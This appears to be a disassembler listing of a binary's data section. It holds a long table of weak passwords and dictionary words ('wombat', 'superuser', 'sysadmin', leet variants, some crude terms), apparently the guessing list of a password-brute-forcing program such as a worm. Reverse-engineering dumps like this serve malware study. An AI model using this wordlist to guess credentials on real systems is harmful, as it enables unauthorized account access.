aZimmerman db 'zimmerman',0 ; DATA XREF: _2:004313A8�o
align 4
aZap db 'zap',0 ; DATA XREF: _2:004313A4�o
aYellowstone db 'yellowstone',0 ; DATA XREF: _2:004313A0�o
aXyz db 'xyz',0 ; DATA XREF: _2:0043139C�o
aWisconsin db 'wisconsin',0 ; DATA XREF: _2:00431398�o
align 4
aWilliamsburg db 'williamsburg',0 ; DATA XREF: _2:00431394�o
align 4
aWholesale db 'wholesale',0 ; DATA XREF: _2:00431390�o
align 10h
aTty db 'tty',0 ; DATA XREF: _2:0043138C�o
aTopography db 'topography',0 ; DATA XREF: _2:00431388�o
align 10h
aTemptation db 'temptation',0 ; DATA XREF: _2:00431384�o
align 4
aTelephone db 'telephone',0 ; DATA XREF: _2:00431380�o
align 4
aTangerine db 'tangerine',0 ; DATA XREF: _2:0043137C�o
align 4
aSys db 'sys',0 ; DATA XREF: _2:00431378�o
aSupported db 'supported',0 ; DATA XREF: _2:00431374�o
align 4
aSuperuser db 'superuser',0 ; DATA XREF: _2:00431370�o
align 10h
aSuperstage db 'superstage',0 ; DATA XREF: _2:0043136C�o
align 4
aSun db 'sun',0 ; DATA XREF: _2:00431368�o
aStuttgart db 'stuttgart',0 ; DATA XREF: _2:00431364�o
align 4
aStratford db 'stratford',0 ; DATA XREF: _2:00431360�o
align 4
aStephanie db 'stephanie',0 ; DATA XREF: _2:0043135C�o
align 4
aSignature db 'signature',0 ; DATA XREF: _2:00431358�o
align 10h
aSheffield db 'sheffield',0 ; DATA XREF: _2:00431354�o
align 4
aSal db 'sal',0 ; DATA XREF: _2:00431350�o
aRochester db 'rochester',0 ; DATA XREF: _2:0043134C�o
align 4
aRje db 'rje',0 ; DATA XREF: _2:00431348�o
aRachmaninoff db 'rachmaninoff',0 ; DATA XREF: _2:00431344�o
align 10h
aPub db 'pub',0 ; DATA XREF: _2:00431340�o
aProfessor db 'professor',0 ; DATA XREF: _2:0043133C�o
align 10h
aPrinceton db 'princeton',0 ; DATA XREF: _2:00431338�o
align 4
aPondering db 'pondering',0 ; DATA XREF: _2:00431334�o
align 4
aPolynomial db 'polynomial',0 ; DATA XREF: _2:00431330�o
align 4
aPersimmon db 'persimmon',0 ; DATA XREF: _2:0043132C�o
align 10h
aPercolate db 'percolate',0 ; DATA XREF: _2:00431328�o
align 4
aPam db 'pam',0 ; DATA XREF: _2:00431324�o
aPad db 'pad',0 ; DATA XREF: _2:00431320�o
aOceanography db 'oceanography',0 ; DATA XREF: _2:0043131C�o
align 4
aNutrition db 'nutrition',0 ; DATA XREF: _2:00431318�o
align 10h
aNew db 'new',0 ; DATA XREF: _2:00431314�o
aNet db 'net',0 ; DATA XREF: _2:00431310�o
aMit db 'mit',0 ; DATA XREF: _2:0043130C�o
aMgr db 'mgr',0 ; DATA XREF: _2:00431308�o
aMacintosh db 'macintosh',0 ; DATA XREF: _2:00431304�o
align 4
aLiz db 'liz',0 ; DATA XREF: _2:00431300�o
aLee db 'lee',0 ; DATA XREF: _2:004312FC�o
aLamination db 'lamination',0 ; DATA XREF: _2:004312F8�o
align 10h
aKim db 'kim',0 ; DATA XREF: _2:004312F4�o
aJoy db 'joy',0 ; DATA XREF: _2:004312EC�o
aJen db 'jen',0 ; DATA XREF: _2:004312E8�o
aInnocuous db 'innocuous',0 ; DATA XREF: _2:004312E4�o
align 4
aImbroglio db 'imbroglio',0 ; DATA XREF: _2:004312E0�o
align 4
aIbm db 'ibm',0 ; DATA XREF: _2:004312DC�o
aHappening db 'happening',0 ; DATA XREF: _2:004312D8�o
align 4
aHal db 'hal',0 ; DATA XREF: _2:004312D4�o
aGnu db 'gnu',0 ; DATA XREF: _2:004312D0�o
aFun db 'fun',0 ; DATA XREF: _2:004312CC�o
aForesight db 'foresight',0 ; DATA XREF: _2:004312C8�o
align 4
aFoolproof db 'foolproof',0 ; DATA XREF: _2:004312C4�o
align 4
aExtension db 'extension',0 ; DATA XREF: _2:004312C0�o
align 4
aEstablish db 'establish',0 ; DATA XREF: _2:004312BC�o
align 10h
aEnterprise db 'enterprise',0 ; DATA XREF: _2:004312B8�o
align 4
aElizabeth db 'elizabeth',0 ; DATA XREF: _2:004312B4�o
align 4
aEiderdown db 'eiderdown',0 ; DATA XREF: _2:004312B0�o
align 4
aEdinburgh db 'edinburgh',0 ; DATA XREF: _2:004312AC�o
align 10h
aDos db 'dos',0 ; DATA XREF: _2:004312A8�o
aDog db 'dog',0 ; DATA XREF: _2:004312A4�o
aDiscovery db 'discovery',0 ; DATA XREF: _2:004312A0�o
align 4
aDesperate db 'desperate',0 ; DATA XREF: _2:0043129C�o
align 10h
aDeb db 'deb',0 ; DATA XREF: _2:00431298�o
aCornelius db 'cornelius',0 ; DATA XREF: _2:00431294�o
align 10h
aCommrades db 'commrades',0 ; DATA XREF: _2:00431290�o
align 4
aChristine db 'christine',0 ; DATA XREF: _2:0043128C�o
align 4
aChristina db 'christina',0 ; DATA XREF: _2:00431288�o
align 4
aChemistry db 'chemistry',0 ; DATA XREF: _2:00431284�o
align 10h
aCatherine db 'catherine',0 ; DATA XREF: _2:00431280�o
align 4
aCat db 'cat',0 ; DATA XREF: _2:0043127C�o
aCampanile db 'campanile',0 ; DATA XREF: _2:00431278�o
align 4
aCad db 'cad',0 ; DATA XREF: _2:00431274�o
aBsd db 'bsd',0 ; DATA XREF: _2:00431270�o
aBob db 'bob',0 ; DATA XREF: _2:0043126C�o
aBicameral db 'bicameral',0 ; DATA XREF: _2:00431268�o
align 4
aBeethoven db 'beethoven',0 ; DATA XREF: _2:00431264�o
align 10h
aAtmosphere db 'atmosphere',0 ; DATA XREF: _2:00431260�o
align 4
aAsm db 'asm',0 ; DATA XREF: _2:0043125C�o
aAsd db 'asd',0 ; DATA XREF: _2:00431258�o
aAnthropogenic db 'anthropogenic',0 ; DATA XREF: _2:00431254�o
align 4
aAnn db 'ann',0 ; DATA XREF: _2:00431250�o
aAndromache db 'andromache',0 ; DATA XREF: _2:0043124C�o
align 4
aAmy db 'amy',0 ; DATA XREF: _2:00431248�o
aAmorphous db 'amorphous',0 ; DATA XREF: _2:00431244�o
align 4
aAma db 'ama',0 ; DATA XREF: _2:00431240�o
aAlf db 'alf',0 ; DATA XREF: _2:0043123C�o
aAlbatross db 'albatross',0 ; DATA XREF: _2:00431238�o
align 4
aAda db 'ada',0 ; DATA XREF: _2:00431234�o
aH4x0ring db 'h4x0ring',0 ; DATA XREF: _2:00431230�o
align 4
aH4x0r1ng db 'h4x0r1ng',0 ; DATA XREF: _2:0043122C�o
align 4
aH4x1ng db 'h4x1ng',0 ; DATA XREF: _2:00431228�o
align 4
aHaxing db 'haxing',0 ; DATA XREF: _2:00431224�o
align 4
aHax db 'hax',0 ; DATA XREF: _2:00431220�o
aWh0re db 'wh0re',0 ; DATA XREF: _2:0043121C�o
align 10h
aHo db 'ho',0 ; DATA XREF: _2:00431218�o
align 4
aWh0r3 db 'wh0r3',0 ; DATA XREF: _2:00431214�o
align 4
aWindoze95 db 'windoze95',0 ; DATA XREF: _2:00431210�o
align 4
aWindoze98 db 'windoze98',0 ; DATA XREF: _2:0043120C�o
align 4
aWindozeme db 'windozeME',0 ; DATA XREF: _2:00431208�o
align 10h
aWindoze2k db 'windoze2k',0 ; DATA XREF: _2:00431204�o
align 4
aWindozexp db 'windozexp',0 ; DATA XREF: _2:00431200�o
align 4
aWindows95 db 'windows95',0 ; DATA XREF: _2:004311FC�o
align 4
aWindows98 db 'windows98',0 ; DATA XREF: _2:004311F8�o
align 10h
aWindowsme db 'windowsME',0 ; DATA XREF: _2:004311F4�o
align 4
aWindows2k db 'windows2k',0 ; DATA XREF: _2:004311F0�o
align 4
aWindowsxp db 'WindowsXP',0 ; DATA XREF: _2:004311EC�o
align 4
aMs db 'MS',0 ; DATA XREF: _2:004311E8�o
align 4
aM db 'M$',0 ; DATA XREF: _2:004311E4�o
align 4
aBilly db 'billy',0 ; DATA XREF: _2:004311E0�o
align 4
aWindose db 'windose',0 ; DATA XREF: _2:004311DC�o
aWindoze db 'windoze',0 ; DATA XREF: _2:004311D8�o
aWindowz db 'windowz',0 ; DATA XREF: _2:004311D4�o
aWileecoyote db 'wileecoyote',0 ; DATA XREF: _2:004311D0�o
aDonaldduck db 'donaldduck',0 ; DATA XREF: _2:004311CC�o
align 4
aAlexander db 'Alexander',0 ; DATA XREF: _2:004311C8�o
align 10h
aAl3x db 'Al3x',0 ; DATA XREF: _2:004311C4�o
align 4
aDud3 db 'dud3',0 ; DATA XREF: _2:004311C0�o
align 10h
aDudette db 'dudette',0 ; DATA XREF: _2:004311BC�o
aD00d db 'd00d',0 ; DATA XREF: _2:004311B8�o
align 10h
aLol db 'lol',0 ; DATA XREF: _2:004311B4�o
aRoscopcoltrane db 'RoscoPColtrane',0 ; DATA XREF: _2:004311B0�o
align 4
aRoscop db 'RoscoP',0 ; DATA XREF: _2:004311AC�o
align 4
aRosco db 'Rosco',0 ; DATA XREF: _2:004311A8�o
align 4
aRoss db 'Ross',0 ; DATA XREF: _2:004311A4�o
align 4
aTestin db 'testin',0 ; DATA XREF: _2:004311A0�o
align 4
aTester db 'tester',0 ; DATA XREF: _2:0043119C�o
align 4
a00000000 db '00000000',0 ; DATA XREF: _2:00431198�o
align 4
aZulu db 'zulu',0 ; DATA XREF: _2:00431194�o
align 10h
aZombie db 'zombie',0 ; DATA XREF: _2:00431190�o
align 4
aZmodem db 'zmodem',0 ; DATA XREF: _2:0043118C�o
align 10h
aZimmerma db 'zimmerma',0 ; DATA XREF: _2:00431188�o
align 4
aZiggy db 'ziggy',0 ; DATA XREF: _2:00431184�o
align 4
aZeitgeis db 'zeitgeis',0 ; DATA XREF: _2:00431180�o
align 10h
aZebra db 'zebra',0 ; DATA XREF: _2:0043117C�o
align 4
aYoung db 'young',0 ; DATA XREF: _2:00431178�o
align 10h
aYosemite db 'yosemite',0 ; DATA XREF: _2:00431174�o
align 4
aYolanda db 'yolanda',0 ; DATA XREF: _2:00431170�o
aYellowst db 'yellowst',0 ; DATA XREF: _2:0043116C�o
align 10h
aYellow db 'yellow',0 ; DATA XREF: _2:00431168�o
align 4
aYankee db 'yankee',0 ; DATA XREF: _2:00431164�o
align 10h
aYang db 'yang',0 ; DATA XREF: _2:00431160�o
align 4
aYaco db 'yaco',0 ; DATA XREF: _2:0043115C�o
align 10h
aXyzzy db 'xyzzy',0 ; DATA XREF: _2:00431158�o
align 4
aXray db 'xray',0 ; DATA XREF: _2:00431154�o
align 10h
aXmodem db 'xmodem',0 ; DATA XREF: _2:00431150�o
align 4
aXmen db 'xmen',0 ; DATA XREF: _2:0043114C�o
align 10h
aXman db 'xman',0 ; DATA XREF: _2:00431148�o
align 4
aXfer db 'xfer',0 ; DATA XREF: _2:00431144�o
align 10h
aXena db 'xena',0 ; DATA XREF: _2:00431140�o
align 4
aWyoming db 'wyoming',0 ; DATA XREF: _2:0043113C�o
aWwii db 'wwii',0 ; DATA XREF: _2:00431138�o
align 4
aWormwood db 'wormwood',0 ; DATA XREF: _2:00431134�o
align 4
aWorm db 'worm',0 ; DATA XREF: _2:00431130�o
align 4
aWork db 'work',0 ; DATA XREF: _2:0043112C�o
align 4
aWorf db 'worf',0 ; DATA XREF: _2:00431128�o
align 4
aWordperf db 'wordperf',0 ; DATA XREF: _2:00431124�o
align 4
aWord db 'word',0 ; DATA XREF: _2:00431120�o
align 10h
aWoodwind db 'woodwind',0 ; DATA XREF: _2:0043111C�o
align 4
aWood db 'wood',0 ; DATA XREF: _2:00431118�o
align 4
aWomen db 'women',0 ; DATA XREF: _2:00431114�o
align 4
aWombat db 'wombat',0 ; DATA XREF: _2:00431110�o
align 4
aWoman db 'woman',0 ; DATA XREF: _2:0043110C�o
align 4
aWolverin db 'wolverin',0 ; DATA XREF: _2:00431108�o
align 4
aWolf db 'wolf',0 ; DATA XREF: _2:00431104�o
align 10h
aWizard db 'wizard',0 ; DATA XREF: _2:00431100�o
align 4
aWithin db 'within',0 ; DATA XREF: _2:004310FC�o
align 10h
aWiseass db 'wiseass',0 ; DATA XREF: _2:004310F8�o
aWisconsi db 'wisconsi',0 ; DATA XREF: _2:004310F4�o
align 4
aWired db 'wired',0 ; DATA XREF: _2:004310F0�o
align 4
aWinston db 'winston',0 ; DATA XREF: _2:004310EC�o
aWing db 'wing',0 ; DATA XREF: _2:004310E8�o
align 4
aWine db 'wine',0 ; DATA XREF: _2:004310E4�o
align 4
aWindows db 'windows',0 ; DATA XREF: _2:004310E0�o
aWilma db 'wilma',0 ; DATA XREF: _2:004310DC�o
align 4
aWillie db 'willie',0 ; DATA XREF: _2:004310D8�o
align 4
aWilliams db 'williams',0 ; DATA XREF: _2:004310D4�o
align 4
aWilliam db 'william',0 ; DATA XREF: _2:004310D0�o
aWill db 'will',0 ; DATA XREF: _2:004310CC�o
align 4
aWhore db 'whore',0 ; DATA XREF: _2:004310C8�o
align 10h
aWholesal db 'wholesal',0 ; DATA XREF: _2:004310C4�o
align 4
aWhitney db 'whitney',0 ; DATA XREF: _2:004310C0�o
aWhiting db 'whiting',0 ; DATA XREF: _2:004310BC�o
aWhite db 'white',0 ; DATA XREF: _2:004310B8�o
align 4
aWhisky db 'whisky',0 ; DATA XREF: _2:004310B4�o
align 4
aWhatnot db 'whatnot',0 ; DATA XREF: _2:004310B0�o
aWhatever db 'whatever',0 ; DATA XREF: _2:004310AC�o
align 10h
aWestern db 'western',0 ; DATA XREF: _2:004310A8�o
aWest db 'west',0 ; DATA XREF: _2:004310A4�o
align 10h
aWerewolf db 'werewolf',0 ; DATA XREF: _2:004310A0�o
align 4
aWendy db 'wendy',0 ; DATA XREF: _2:0043109C�o
align 4
aWendi db 'wendi',0 ; DATA XREF: _2:00431098�o
align 4
aWell db 'well',0 ; DATA XREF: _2:00431094�o
align 4
aWeenie db 'weenie',0 ; DATA XREF: _2:00431090�o
align 4
aWeed db 'weed',0 ; DATA XREF: _2:0043108C�o
align 4
aWednesda db 'wednesda',0 ; DATA XREF: _2:00431088�o
align 10h
aWebpage db 'webpage',0 ; DATA XREF: _2:00431084�o
aWave db 'wave',0 ; DATA XREF: _2:00431080�o
align 10h
aWater db 'water',0 ; DATA XREF: _2:0043107C�o
align 4
aWatchwor db 'watchwor',0 ; DATA XREF: _2:00431078�o
align 4
aWasp db 'wasp',0 ; DATA XREF: _2:00431074�o
align 4
aWarren db 'warren',0 ; DATA XREF: _2:00431070�o
align 4
aWarp db 'warp',0 ; DATA XREF: _2:0043106C�o
align 4
aWargames db 'wargames',0 ; DATA XREF: _2:00431068�o
align 4
aWarfare db 'warfare',0 ; DATA XREF: _2:00431064�o
aWarez db 'warez',0 ; DATA XREF: _2:00431060�o
align 4
aWard db 'ward',0 ; DATA XREF: _2:0043105C�o
align 10h
aWaco db 'waco',0 ; DATA XREF: _2:00431058�o
align 4
aVodka db 'vodka',0 ; DATA XREF: _2:00431054�o
align 10h
aVisualba db 'visualba',0 ; DATA XREF: _2:00431050�o
align 4
aVisual db 'visual',0 ; DATA XREF: _2:0043104C�o
align 4
aVisitor db 'visitor',0 ; DATA XREF: _2:00431048�o
aVirus db 'virus',0 ; DATA XREF: _2:00431044�o
align 4
aVirginia db 'virginia',0 ; DATA XREF: _2:00431040�o
align 10h
aVirgin db 'virgin',0 ; DATA XREF: _2:0043103C�o
align 4
aVillage db 'village',0 ; DATA XREF: _2:00431038�o
aVideogam db 'videogam',0 ; DATA XREF: _2:00431034�o
align 4
aVideo db 'video',0 ; DATA XREF: sub_40EE72:loc_4135A0�o
; _2:00431030�o
align 4
aVictor db 'victor',0 ; DATA XREF: _2:0043102C�o
align 4
aVicky db 'vicky',0 ; DATA XREF: _2:00431028�o
align 4
aVertigo db 'vertigo',0 ; DATA XREF: _2:00431024�o
aVeronica db 'veronica',0 ; DATA XREF: _2:00431020�o
align 4
aVenus db 'venus',0 ; DATA XREF: _2:0043101C�o
align 10h
aVasant db 'vasant',0 ; DATA XREF: _2:00431018�o
align 4
aVampire db 'vampire',0 ; DATA XREF: _2:00431014�o
aValerie db 'valerie',0 ; DATA XREF: _2:00431010�o
aVagina db 'vagina',0 ; DATA XREF: _2:0043100C�o
align 10h
aUucp db 'uucp',0 ; DATA XREF: _2:00431008�o
align 4
aUtility db 'utility',0 ; DATA XREF: _2:00431004�o
aUtil db 'util',0 ; DATA XREF: _2:00431000�o
align 4
aUsmc db 'usmc',0 ; DATA XREF: _2:00430FFC�o
align 10h
aUsername_0 db 'username',0 ; DATA XREF: _2:00430FF8�o
align 4
aUsermane db 'usermane',0 ; DATA XREF: _2:00430FF4�o
align 4
aUsenet db 'usenet',0 ; DATA XREF: _2:00430FF0�o
align 10h
aUrsula db 'ursula',0 ; DATA XREF: _2:00430FEC�o
align 4
aUrchin db 'urchin',0 ; DATA XREF: _2:00430FE8�o
align 10h
aUranus db 'uranus',0 ; DATA XREF: _2:00430FE4�o
align 4
aUpload db 'upload',0 ; DATA XREF: _2:00430FE0�o
align 10h
aUnlock db 'unlock',0 ; DATA XREF: _2:00430FDC�o
align 4
aUnknown_2 db 'unknown',0 ; DATA XREF: _2:00430FD8�o
aUniversi db 'universi',0 ; DATA XREF: _2:00430FD4�o
align 4
aUniverse db 'universe',0 ; DATA XREF: _2:00430FD0�o
align 4
aUniversa db 'universa',0 ; DATA XREF: _2:00430FCC�o
align 4
aUniform db 'uniform',0 ; DATA XREF: _2:00430FC8�o
aUnicorn db 'unicorn',0 ; DATA XREF: _2:00430FC4�o
aUnhappy db 'unhappy',0 ; DATA XREF: _2:00430FC0�o
aUndo db 'undo',0 ; DATA XREF: _2:00430FBC�o
align 4
aUncle db 'uncle',0 ; DATA XREF: _2:00430FB8�o
align 4
aUmesh db 'umesh',0 ; DATA XREF: _2:00430FB4�o
align 4
aUgly db 'ugly',0 ; DATA XREF: _2:00430FB0�o
align 4
aTuttle db 'tuttle',0 ; DATA XREF: _2:00430FAC�o
align 4
aTurn db 'turn',0 ; DATA XREF: _2:00430FA8�o
align 4
aTuesday db 'tuesday',0 ; DATA XREF: _2:00430FA4�o
aTubas db 'tubas',0 ; DATA XREF: _2:00430FA0�o
align 4
aTruth db 'truth',0 ; DATA XREF: _2:00430F9C�o
align 4
aTrue db 'true',0 ; DATA XREF: _2:00430F98�o
align 4
aTron db 'tron',0 ; DATA XREF: _2:00430F94�o
align 4
aTrombone db 'trombone',0 ; DATA XREF: _2:00430F90�o
align 10h
aTrojan db 'trojan',0 ; DATA XREF: _2:00430F8C�o
align 4
aTrivial db 'trivial',0 ; DATA XREF: _2:00430F88�o
aTrisha db 'trisha',0 ; DATA XREF: _2:00430F84�o
align 4
aTrek db 'trek',0 ; DATA XREF: _2:00430F80�o
align 10h
aTree db 'tree',0 ; DATA XREF: _2:00430F7C�o
align 4
aTrapdoor db 'trapdoor',0 ; DATA XREF: _2:00430F78�o
align 4
aTrap db 'trap',0 ; DATA XREF: _2:00430F74�o
align 4
aTransfer db 'transfer',0 ; DATA XREF: _2:00430F70�o
align 4
aTrails db 'trails',0 ; DATA XREF: _2:00430F6C�o
align 10h
aTracy db 'tracy',0 ; DATA XREF: _2:00430F68�o
align 4
aTracie db 'tracie',0 ; DATA XREF: _2:00430F64�o
align 10h
aTraci db 'traci',0 ; DATA XREF: _2:00430F60�o
align 4
aToyota db 'toyota',0 ; DATA XREF: _2:00430F5C�o
align 10h
aToxic db 'toxic',0 ; DATA XREF: _2:00430F58�o
align 4
aTortoise db 'tortoise',0 ; DATA XREF: _2:00430F54�o
align 4
aTopograp db 'topograp',0 ; DATA XREF: _2:00430F50�o
align 10h
aTomato db 'tomato',0 ; DATA XREF: _2:00430F4C�o
align 4
aTokenrin db 'tokenrin',0 ; DATA XREF: _2:00430F48�o
align 4
aToken db 'token',0 ; DATA XREF: _2:00430F44�o
align 4
aToggle db 'toggle',0 ; DATA XREF: _2:00430F40�o
align 4
aToad db 'toad',0 ; DATA XREF: _2:00430F3C�o
align 4
aTits db 'tits',0 ; DATA XREF: _2:00430F38�o
align 4
aTina db 'tina',0 ; DATA XREF: _2:00430F34�o
align 4
aTime db 'time',0 ; DATA XREF: _2:00430F30�o
align 4
aTiger db 'tiger',0 ; DATA XREF: _2:00430F2C�o
align 4
aTiffany db 'tiffany',0 ; DATA XREF: _2:00430F28�o
aThursday db 'thursday',0 ; DATA XREF: _2:00430F24�o
align 10h
aThin db 'thin',0 ; DATA XREF: _2:00430F20�o
align 4
aTheresa db 'theresa',0 ; DATA XREF: _2:00430F1C�o
aThailand db 'thailand',0 ; DATA XREF: _2:00430F18�o
align 4
aText db 'text',0 ; DATA XREF: _2:00430F14�o
align 4
aTetris db 'tetris',0 ; DATA XREF: _2:00430F10�o
align 4
aTess db 'tess',0 ; DATA XREF: _2:00430F0C�o
align 4
aTerminat db 'terminat',0 ; DATA XREF: _2:00430F08�o
align 10h
aTerminal db 'terminal',0 ; DATA XREF: _2:00430F04�o
align 4
aTera db 'tera',0 ; DATA XREF: _2:00430F00�o
align 4
aTennis db 'tennis',0 ; DATA XREF: _2:00430EFC�o
align 4
aTemptati db 'temptati',0 ; DATA XREF: _2:00430EF8�o
align 4
aTelnet db 'telnet',0 ; DATA XREF: _2:00430EF4�o
align 10h
aTelephon db 'telephon',0 ; DATA XREF: _2:00430EF0�o
align 4
aTeenage db 'teenage',0 ; DATA XREF: _2:00430EEC�o
aTeen db 'teen',0 ; DATA XREF: _2:00430EE8�o
align 4
aTech db 'tech',0 ; DATA XREF: _2:00430EE4�o
align 4
aTears db 'tears',0 ; DATA XREF: _2:00430EE0�o
align 4
aTeapot db 'teapot',0 ; DATA XREF: _2:00430EDC�o
align 4
aTeam db 'team',0 ; DATA XREF: _2:00430ED8�o
align 4
aTaylor db 'taylor',0 ; DATA XREF: _2:00430ED0�o
align 4
aTarragon db 'tarragon',0 ; DATA XREF: _2:00430ECC�o
align 10h
aTarget db 'target',0 ; DATA XREF: _2:00430EC8�o
align 4
aTara db 'tara',0 ; DATA XREF: _2:00430EC4�o
align 10h
aTape db 'tape',0 ; DATA XREF: _2:00430EC0�o
align 4
aTango db 'tango',0 ; DATA XREF: _2:00430EBC�o
align 10h
aTangerin db 'tangerin',0 ; DATA XREF: _2:00430EB8�o
align 4
aTammy db 'tammy',0 ; DATA XREF: _2:00430EB4�o
align 4
aTamie db 'tamie',0 ; DATA XREF: _2:00430EB0�o
align 4
aTami db 'tami',0 ; DATA XREF: _2:00430EAC�o
align 4
aTamara db 'tamara',0 ; DATA XREF: _2:00430EA8�o
align 4
aTall db 'tall',0 ; DATA XREF: _2:00430EA4�o
align 4
aTalk db 'talk',0 ; DATA XREF: _2:00430EA0�o
align 4
aTabasco db 'tabasco',0 ; DATA XREF: _2:00430E9C�o
aSysop db 'sysop',0 ; DATA XREF: _2:00430E98�o
align 4
aSysadmin db 'sysadmin',0 ; DATA XREF: _2:00430E94�o
align 4
aSymmetry db 'symmetry',0 ; DATA XREF: _2:00430E90�o
align 4
aSybil db 'sybil',0 ; DATA XREF: _2:00430E8C�o
align 4
aSword db 'sword',0 ; DATA XREF: _2:00430E88�o
align 4
aSwitch db 'switch',0 ; DATA XREF: _2:00430E84�o
align 4
aSweat db 'sweat',0 ; DATA XREF: _2:00430E80�o
align 4
aSwearer db 'swearer',0 ; DATA XREF: _2:00430E7C�o
aSuzie db 'suzie',0 ; DATA XREF: _2:00430E78�o
align 4
aSuzanne db 'suzanne',0 ; DATA XREF: _2:00430E74�o
aSusie db 'susie',0 ; DATA XREF: _2:00430E70�o
align 4
aSusanne db 'susanne',0 ; DATA XREF: _2:00430E6C�o
aSusan db 'susan',0 ; DATA XREF: _2:00430E68�o
align 4
aSurfing db 'surfing',0 ; DATA XREF: _2:00430E64�o
aSurfer db 'surfer',0 ; DATA XREF: _2:00430E60�o
align 4
aSupporte db 'supporte',0 ; DATA XREF: _2:00430E5C�o
align 10h
aSupport db 'support',0 ; DATA XREF: _2:00430E58�o
aSupervis db 'supervis',0 ; DATA XREF: _2:00430E54�o
align 4
aSuperuse db 'superuse',0 ; DATA XREF: _2:00430E50�o
align 10h
aSupersta db 'supersta',0 ; DATA XREF: _2:00430E4C�o
align 4
aSuperson db 'superson',0 ; DATA XREF: _2:00430E48�o
align 4
aSuperman db 'superman',0 ; DATA XREF: _2:00430E44�o
align 4
aSunday db 'sunday',0 ; DATA XREF: _2:00430E40�o
align 4
aSummer db 'summer',0 ; DATA XREF: _2:00430E3C�o
align 4
aSucks db 'sucks',0 ; DATA XREF: _2:00430E38�o
align 4
aSuckmydi db 'suckmydi',0 ; DATA XREF: _2:00430E34�o
align 4
aSuck db 'suck',0 ; DATA XREF: _2:00430E30�o
align 10h
aSuccess db 'success',0 ; DATA XREF: _2:00430E2C�o
aSubway db 'subway',0 ; DATA XREF: _2:00430E28�o
align 10h
aSubscrib db 'subscrib',0 ; DATA XREF: _2:00430E24�o
align 4
aStuttgar db 'stuttgar',0 ; DATA XREF: _2:00430E20�o
align 4
aStrip db 'strip',0 ; DATA XREF: _2:00430E18�o
align 10h
aString db 'string',0 ; DATA XREF: _2:00430E14�o
align 4
aStreetfi db 'streetfi',0 ; DATA XREF: _2:00430E10�o
align 4
aStratfor db 'stratfor',0 ; DATA XREF: _2:00430E0C�o
align 10h
aStrangle db 'strangle',0 ; DATA XREF: _2:00430E08�o
align 4
aStrange db 'strange',0 ; DATA XREF: _2:00430E04�o
aStones db 'stones',0 ; DATA XREF: _2:00430E00�o
align 4
aStoned db 'stoned',0 ; DATA XREF: _2:00430DFC�o
align 4
aStoneage db 'stoneage',0 ; DATA XREF: _2:00430DF8�o
align 10h
aSteve db 'steve',0 ; DATA XREF: _2:00430DF4�o
align 4
aStereo db 'stereo',0 ; DATA XREF: _2:00430DF0�o
align 10h
aStephani db 'stephani',0 ; DATA XREF: _2:00430DEC�o
align 4
aSteph db 'steph',0 ; DATA XREF: _2:00430DE8�o
align 4
aSteel db 'steel',0 ; DATA XREF: _2:00430DE4�o
align 4
aSteal db 'steal',0 ; DATA XREF: _2:00430DE0�o
align 4
aSteak db 'steak',0 ; DATA XREF: _2:00430DDC�o
align 4
aStarwars db 'starwars',0 ; DATA XREF: _2:00430DD8�o
align 4
aStartup db 'startup',0 ; DATA XREF: _2:00430DD4�o
aStartrek db 'startrek',0 ; DATA XREF: _2:00430DD0�o
align 4
aStart db 'start',0 ; DATA XREF: sub_40EE72+2069�o
; _2:00430DCC�o
align 4
aStarship db 'starship',0 ; DATA XREF: _2:00430DC8�o
align 10h
aStar db 'star',0 ; DATA XREF: _2:00430DC4�o
align 4
aStacy db 'stacy',0 ; DATA XREF: _2:00430DC0�o
align 10h
aStacie db 'stacie',0 ; DATA XREF: _2:00430DBC�o
align 4
aStaci db 'staci',0 ; DATA XREF: _2:00430DB8�o
align 10h
aStacey db 'stacey',0 ; DATA XREF: _2:00430DB4�o
align 4
aSr71 db 'sr71',0 ; DATA XREF: _2:00430DB0�o
align 10h
aSquires db 'squires',0 ; DATA XREF: _2:00430DAC�o
aSpunk db 'spunk',0 ; DATA XREF: _2:00430DA8�o
align 10h
aSpringer db 'springer',0 ; DATA XREF: _2:00430DA4�o
align 4
aSpring db 'spring',0 ; DATA XREF: _2:00430DA0�o
align 4
aSpred db 'spred',0 ; DATA XREF: _2:00430D9C�o
align 4
aSpit db 'spit',0 ; DATA XREF: _2:00430D98�o
align 4
aSpiderma db 'spiderma',0 ; DATA XREF: _2:00430D94�o
align 10h
aSpider db 'spider',0 ; DATA XREF: _2:00430D90�o
align 4
aSpice db 'spice',0 ; DATA XREF: _2:00430D8C�o
align 10h
aSpell db 'spell',0 ; DATA XREF: _2:00430D88�o
align 4
aSpear db 'spear',0 ; DATA XREF: _2:00430D84�o
align 10h
aSparrows db 'sparrows',0 ; DATA XREF: _2:00430D80�o
align 4
aSpaceshi db 'spaceshi',0 ; DATA XREF: _2:00430D7C�o
align 4
aSouth db 'south',0 ; DATA XREF: _2:00430D78�o
align 10h
aSource db 'source',0 ; DATA XREF: _2:00430D74�o
align 4
aSossina db 'sossina',0 ; DATA XREF: _2:00430D70�o
aSonya db 'sonya',0 ; DATA XREF: _2:00430D6C�o
align 4
aSonic db 'sonic',0 ; DATA XREF: _2:00430D68�o
align 10h
aSonia db 'sonia',0 ; DATA XREF: _2:00430D64�o
align 4
aSondra db 'sondra',0 ; DATA XREF: _2:00430D60�o
align 10h
aSomebody db 'somebody',0 ; DATA XREF: _2:00430D5C�o
align 4
aSoftware db 'software',0 ; DATA XREF: _2:00430D58�o
align 4
aSoft db 'soft',0 ; DATA XREF: _2:00430D54�o
align 10h
aSodomy db 'sodomy',0 ; DATA XREF: _2:00430D50�o
align 4
aSocrates db 'socrates',0 ; DATA XREF: _2:00430D4C�o
align 4
aSocial db 'social',0 ; DATA XREF: _2:00430D48�o
align 4
aSoap db 'soap',0 ; DATA XREF: _2:00430D44�o
align 4
aSnoopy db 'snoopy',0 ; DATA XREF: _2:00430D40�o
align 4
aSnatch db 'snatch',0 ; DATA XREF: _2:00430D3C�o
align 4
aSnake db 'snake',0 ; DATA XREF: _2:00430D38�o
align 4
aSnafu db 'snafu',0 ; DATA XREF: _2:00430D34�o
align 4
aSnach db 'snach',0 ; DATA XREF: _2:00430D30�o
align 4
aSmut db 'smut',0 ; DATA XREF: _2:00430D2C�o
align 4
aSmtp db 'smtp',0 ; DATA XREF: _2:00430D28�o
align 4
aSmother db 'smother',0 ; DATA XREF: _2:00430D24�o
aSmooch db 'smooch',0 ; DATA XREF: _2:00430D20�o
align 4
aSmiles db 'smiles',0 ; DATA XREF: _2:00430D1C�o
align 4
aSmile db 'smile',0 ; DATA XREF: _2:00430D18�o
align 4
aSmart db 'smart',0 ; DATA XREF: _2:00430D14�o
align 4
